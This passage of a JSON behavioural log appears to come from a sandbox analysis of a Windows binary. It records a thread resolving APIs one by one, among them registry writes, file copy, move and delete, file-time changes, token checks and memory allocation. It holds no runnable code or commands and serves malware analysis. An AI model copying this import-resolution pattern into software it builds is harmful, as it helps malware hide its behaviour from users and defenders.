"parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1096 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075d2", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 1097 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075e3", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1098 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075e6", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 1099 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075fa", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1100 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075fd", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878480" } ], "repeated": 0, "id": 1101 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407611", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1102 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407614", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881350" } ], "repeated": 0, "id": 1103 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407622", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1104 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407625", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileAttributesW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837a0" } ], "repeated": 0, "id": 1105 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407636", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1106 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407639", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MoveFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758799b0" } ], "repeated": 0, "id": 1107 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 1108 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407652", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75db1050" } ], "repeated": 0, "id": 1109 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407668", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 1110 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040766b", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75ef7850" } ], "repeated": 0, "id": 1111 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040767e", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1112 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407681", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 1113 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407691", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1114 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407694", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceec0" } ], "repeated": 0, "id": 1115 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076a1", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1116 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076a4", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 1117 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076b7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1118 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ba", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecedf0" } ], "repeated": 0, "id": 1119 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076c7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1120 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ca", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 1121 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076d7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1122 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076da", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf100" } ], "repeated": 0, "id": 1123 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076e7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1124 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ea", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 1125 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076fb", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1126 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076fe", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883380" } ], "repeated": 0, "id": 1127 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040770c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1128 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040770f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 1129 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407720", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1130 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407723", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835f0" } ], "repeated": 0, "id": 1131 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407731", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1132 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407734", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837e0" } ], "repeated": 0, "id": 1133 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407742", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1134 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407745", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883a50" } ], "repeated": 0, "id": 1135 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407759", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1136 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040775c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833e0" } ], "repeated": 0, "id": 1137 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407770", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1138 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407773", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 1139 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407781", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1140 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407784", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 1141 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407798", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 1142 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040779b", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 1143 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077ae", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1144 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077b1", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 1145 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077be", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1146 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077c1", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 1147 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077ce", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1148 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077d1", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "OpenProcessToken" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef40" } ], "repeated": 0, "id": 1149 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077e4", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1150 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077e7", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "GetTokenInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceba0" } ], "repeated": 0, "id": 1151 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077fa", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1152 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077fd", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "AllocateAndInitializeSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf4a0" } ], "repeated": 0, "id": 1153 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407810", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1154 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407813", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "EqualSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed07e0" } ], "repeated": 0, "id": 1155 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407826", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 1156 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407829", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "LookupAccountSidA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ef8100" } ], "repeated": 0, "id": 1157 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040783c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1158 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040783f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 1159 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040784c", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1160 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040784f", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 1161 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407862", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1162 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407865", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 1163 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407878", "parentcaller": "0x00409c49", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 1164 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040787b", "parentcaller": "0x00409c49", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": 